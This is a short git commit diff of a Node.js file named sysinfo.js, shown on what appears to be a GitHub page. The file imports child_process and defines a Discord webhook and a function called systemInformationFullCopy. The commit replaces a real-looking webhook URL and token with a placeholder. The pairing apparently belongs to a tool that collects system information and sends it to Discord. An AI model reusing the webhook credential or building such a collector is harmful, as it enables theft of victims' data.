Update sysinfo.js

This commit is contained in:
gumbobr0t
2023-11-14 21:05:37 +01:00
committed by GitHub
parent aaa3d481e8
commit ae89f2f6f2

View File

@@ -5,7 +5,7 @@ const os = require('os')
const path = require('path') const path = require('path')
const { execSync } = require('child_process') const { execSync } = require('child_process')
const webhook = 'https://discord.com/api/webhooks/1174058827046473821/ntdtWTD8o2Vhy5YHtxtFw3DAj23Oqe4RMd01tbgQEHXD04iJwVCbg3LZSfXCdcBKoUnd' const webhook = 'https://discord.com/api/webhooks/xxx/xxx'
async function systemInformationFullCopy() { async function systemInformationFullCopy() {
try { try {